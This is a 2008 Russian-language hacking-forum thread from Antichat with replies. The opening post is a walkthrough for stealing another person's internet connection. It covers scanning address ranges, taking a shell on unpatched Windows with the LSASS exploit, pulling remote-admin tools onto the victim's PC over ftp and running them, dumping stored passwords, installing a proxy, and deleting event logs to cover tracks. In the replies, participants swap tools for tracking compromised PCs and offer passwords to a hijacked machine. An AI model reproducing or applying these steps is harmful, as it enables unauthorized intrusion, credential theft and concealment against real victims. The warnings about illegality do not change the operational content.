ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Халявный Интернет (для взрослых и немощных )
  #1  
Старый 09.12.2008, 06:00
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
Thumbs up Халявный Интернет (для взрослых и немощных )

Начну с того , что мне уже порядком недоели темы на форуме , типо "Халявный инет" и тд и тп .


С этой статье я приведу примеры (Гуру идут лесом ) как можно найти этот самый халявный инетернет , но помните это плохо , и уголовнонаказуемо !!!

Начну с того , что инет можно добыть несколькими способами , первый это настоящий взлом , второй способ это впарить жертве трояна , заманить на заражённую ссылку с эксплойтом и тд , и третий прийти к жертве и в наглую поставить ему прокси и юзать его инет !

Бредисловие

В недавном прошлом , на многих компьютерах стояли , Windows 2000 , Windows XP Home , Windows XP Pro sp1 , так вот все они были уязвимы и взламать их можно было посредством эксплойта SmallSoft Lsa Service Exploit или lsa.exe , этот эксплойт старый и использует уязвимость в lsass.exe, кстати в некоторых сетях до сих пор есть такие машины, которые уязвимы , толи люди не знают про sp2 , sp3 , толи просто им просто лень ставить hotfixы и закрыть 445 порт , хз , мол работает комп, да и ладно

Ну... полетели

Скачиваем сканер портов Angry IP Scanner идём в настройки , и прописываем порты 21,22,135,138,139,445,1025,4489,3389 и тд и тп
Выбираем метод сканирование "Alive hosts (repoding pings only), сохраняем ,затем выбираем IP Range и вбиваем ипы вышей сети , к примеру , а так ипы должны быть вашей сети !!!

Код:
10.0.0.0-255.255.255.255
Начинаем сканировать , вот появились первые клиенты , обращаем внимание на тех у кого больше всего открыто портов , затем берём эксплойт SmallSoft Lsa Service Exploit или lsa.exe и вписываем ip жертвы, тип атаки Shell и жмём Начать



если , уязвимость есть то вы получаете командную строку компьютера жертвы cmd.exe,

то есть вот такое чёрное dos окошечко, если уязвимости нет, окошко повисит и пропадёт и вы идёте лесом

ну допустим мы получили shell , теперь вам будет нужно поднять у себя на компьютере FTP-сервер , я выбрал Serv-U

Цитата:
Serv-U представляет собой мощный, гибкий и легкий в установке ftp-сервер для всех платформ Windows. Функции безопасности обеспечиваются паролями и установкой прав на запись, чтение и изменение для каталогов и файлов для каждого пользователя, а также контролем доступа по IP-адресам.
Настроить его сможет даже ребёнок , заливаем к себе на фтп сервер нужные нам для дальнейшей работы файлы , выберем радмин сервер,ccproxy.exe и terminal.exe о нём почитать можно тут это замечательная статья от-=lebed=-, но или любой другой софт который вы используете .

Теперь возвращаемся в наше окошечко с полученным шеллом , и подключаемся к нашему ФТП-серверу

Код:
С:\WINDOWS\ftp
ftp> o
(to)   (ваш ип) 
ftp: connect: 127.0.0.1(login): anonymous 
pass:Enter
Вошли на свой фтп , и идём в директорую где лежат наши файлы

Код:
dir
команды по работе с фтп вы можете найти у себя в справке и поддержке , достаточно набрать ftp .

Так теперь , закачаем на комп жертвы наши файлы :
PHP код:
get radmin.exe
get terminal
.exe

готово 
выходим 
bye 
идём в директорую куда мы залили наши файлы , лучше выбрать директорую по глубже

С:\WINDOWS\system32 просмотрим командой dir
так... вот они голубчики :
Цитата:
radmin.exe
terminal.exe
запустим их

Код:
С:\WINDOWS\system32\terminal.exe 
С:\WINDOWS\system32\radmin.exe
Ну вот и всё ! теперь мы может всё видеть и делать своё темное дело дальше

Хочу сказать , что мы произвели честный то есть тру взлом , мы никому ничего не впаривали , то есть нашли уязвимость и честно её юзаем , вывод , челу нужно закрыть 445 порт , поставить или обновить антивирь(кстати он тут не причём , бывали случаи когда на компах стоял KAV6 и при этом можно было приспокойной получить shell) и установить хороший фаерволл !

Летим дальше , думаю вы поняли прочитав статью Лебедя для чего нам нужен terminal.exe , да да да , вот именно , плюс ко всему мы ещё получили бесплатный дедик ! так заходим в наш дедик , давайте осмотримся , что тут есть .... угу ... нам нужны пассы от всего что тут есть , скачиваем программу MPR
запускаем смотрим , ага , вот нам и пасс от аськи , веб форм , и пароли от так желаемого нами интернета .

Наступает долгожданный момент !!! Но ... мы понимаем , что если мы сейчас запустим тут инет , то вылетим из локалки или не запустим инет вообще , так так так , и тут нам на помощь приходит замечательная программка RASPPPOE_099 идём на офф сайт скачиваем , распаковываем в любую папку , далее идём в Панель Управления>Cетевыe подключение>Подключения по локальной сети>Свойства , там Протокол Интеренета TCP/IP жмём Свойства , и выбираем Протокол=Добавить, далее нажмите кнопку «Установить с Диска». Да чё я тут распинаюсь вот тут можно посмотреть и почитать , там даже с картинками http://www.rdtc.ru/internet_ivd_PPPoE_XP.php3

Так всё готово , бывает что нужно перегрузиться , но в большенстве случаев этого можно и не делать !

И вот мы уже юзаем чужой инет , стыдно ? конечно стыдно и тем более за это есть статья !!! ПОМНИТЕ ОБ ЭТОМ ! не стоит этот всех этих усилий , тем более ,что анлим сейчас стоит копейки !!!

Ну что теперь осталось скачать любой прокси сервер , установить его на компе жертвы , вернуться к себе , затем в FireFox>Инстументы>Настройки>Допо нительно>Network=Settings=Manual Proxy configuration , вписываем ип жертвы и порт нашего прокси сервера . И радуемся чужому инету

Потом если у жертвы анлим , то можно уже с его компа производить сканирование портов и дальнейшие взломы , а вот ещё чуть не забыл , чтобы не палится нужно чистить лог , зайдите сюда C:\WINDOWS\system32\config , AppEvent.Evt , SecEvent.Evt и тд , и удалите их на фиг , если будут проблемы с удалением и чисткой , скачайте Unlocker и он поможет решить все ваши проблемы .

Если кому в лом искать и качать данный софт , залил Вот всё в одном флаконе !!! terminal.exe KAV_keygen=радмин, ipscan и старый сплойт , в архиве lsa.rar, RASPPPOE_099.ZIP,CCProxy.rar, Keygen KAV_all.exe=радмин-сервер , хочу заметить , что пинчей и всякой прочей лабуду в этих файла нет , отмечу что на CCProxy.ехе после обработки его Reshackom стал рычать на него Nod 32 , с радмином я думаю всё тоже ясно , но по крайне мере это юзалось , то однин Каспер на него повизгивал и тогда когда конектишься к нему через TELNET , мол атака RootShell , Telminal.exe тоже не буду выкладывать , сначало почитайте статью Лебедя -=lebed=-тут там и скачаете Terminal.exe , MPR тоже выкладывать не буду потому что на него рычат антивири , мол Троян PWS , чтобы потом не было предъяв , мол я кому то троя пытался впарить !!!

Послесловие :

Надеюсь после этой статейки , больше не будет тем " Халявный Инет и тд и тп "(стану модером буду банить за такие топы ) и помните это уголовнонаказуемо и противозаконно ! не
использовать на практике !!!!


Всего всем доброго , удачи

http://stopxaker.com

Последний раз редактировалось stopxaker; 19.05.2009 в 00:43..
 
Ответить с цитированием

  #2  
Старый 09.12.2008, 09:53
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Познавательно..., лови +2 )
 
Ответить с цитированием

  #3  
Старый 10.12.2008, 00:17
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию

Цитата:
Сообщение от -m0rgan-  
Познавательно..., лови +2 )
Спасибо , но у меня есть одна проблема , блин теряю компы , то есть ипы у всех динамо , и трудно потом искать их по всей стране , кто какую прогу может посоветовать , чтобы она хотя бы мне на мыло ипы отстукивала , пинча и прочию гадость не предологать
 
Ответить с цитированием

  #4  
Старый 10.12.2008, 13:26
Аватар для NeXArmAor
NeXArmAor
Участник форума
Регистрация: 21.04.2007
Сообщений: 289
Провел на форуме:
4612647

Репутация: 368
По умолчанию

Цитата:
Сообщение от stopxaker  
Спасибо , но у меня есть одна проблема , блин теряю компы , то есть ипы у всех динамо , и трудно потом искать их по всей стране , кто какую прогу может посоветовать , чтобы она хотя бы мне на мыло ипы отстукивала , пинча и прочию гадость не предологать
Есть такая прога у меня. Отсылает на mail каждые 10 минут IP адрес компа.
 
Ответить с цитированием

  #5  
Старый 10.12.2008, 00:26
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

ппц нах его доставать он стал уже настока дешевым и доступным до неприличия просто
а уж еси так вам приспичило то пинч решит любую вашу проблему (ну почти)

ппц нах статью еще писать

Цитата:
Бредисловие
убило вообще
 
Ответить с цитированием

  #6  
Старый 10.12.2008, 00:56
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Да, именно так просто всё и было... когда-то - настальжи... Вспомним ещё авторутер KAHT2 который проходился по диапазонам IP и напоровшись на дырявую винду давал CMD-шелл.
P.S. Флейм в разделе запрещён!

Последний раз редактировалось -=lebed=-; 10.12.2008 в 18:28..
 
Ответить с цитированием

  #7  
Старый 10.12.2008, 13:18
Аватар для St0nX
St0nX
Участник форума
Регистрация: 19.05.2007
Сообщений: 281
Провел на форуме:
2823587

Репутация: 106
Отправить сообщение для St0nX с помощью ICQ
По умолчанию

Проще написать проксю и впарить. А это уже года 2 - 3 как не актуально.
 
Ответить с цитированием

  #8  
Старый 10.12.2008, 17:28
Аватар для Kluivert
Kluivert
Новичок
Регистрация: 22.03.2006
Сообщений: 10
Провел на форуме:
46000

Репутация: 0
По умолчанию

Актуально поиметь халявный инет с EDGE к примеру мегафон модем, билайн и МТС, пока ничего путного найти не получилось.
 
Ответить с цитированием

  #9  
Старый 10.12.2008, 22:27
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Kluivert  
Актуально поиметь халявный инет с EDGE к примеру мегафон модем, билайн и МТС, пока ничего путного найти не получилось.
Эту статейку я написал для ознакомления , как иметь инет с билайна и МТС понятия не имею !

ну ладно это ерунда , у меня тут другая проблема , есть доступ к компу с радмином , то есть там их стояло два один версии 2.2 , другой 3 , тот что был версии 2.2 , его перебил своим радмином , но вот что то не могу понять , если я пишу этот ип в браузере , то попадаю на страницу

Цитата:
Access forbidden! You don't have permission to access the requested object. It is either read-protected or not readable by the server.
бла бла

внизу написанно

Цитата:
Error Wed Dec 10 21:21:08 2008 Apache/2.2.4 (Linux/SUSE)
но на этом же ипе я сижу у него на компе но там Windows XP , смотрел на компе вроде виртуалки нет !!!! Но на рабочем столе вижу есть Putty , что это может быть ??? просто я ещё с такими делами не сталкивался !

Если кому инетересно посмотрите , в ПМ скину ip и пароль от радмина , только тем у кого репа не ниже Эксперт, Гуру (без обид)

Последний раз редактировалось stopxaker; 10.12.2008 в 22:58..
 
Ответить с цитированием

  #10  
Старый 17.12.2008, 22:35
Аватар для Buffalon
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

Цитата:
Сообщение от stopxaker  
Эту статейку я написал для ознакомления , как иметь инет с билайна и МТС понятия не имею !

ну ладно это ерунда , у меня тут другая проблема , есть доступ к компу с радмином , то есть там их стояло два один версии 2.2 , другой 3 , тот что был версии 2.2 , его перебил своим радмином , но вот что то не могу понять , если я пишу этот ип в браузере , то попадаю на страницу



бла бла

внизу написанно



но на этом же ипе я сижу у него на компе но там Windows XP , смотрел на компе вроде виртуалки нет !!!! Но на рабочем столе вижу есть Putty , что это может быть ??? просто я ещё с такими делами не сталкивался !

Если кому инетересно посмотрите , в ПМ скину ip и пароль от радмина , только тем у кого репа не ниже Эксперт, Гуру (без обид)
.Прикалываешься что ле???
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ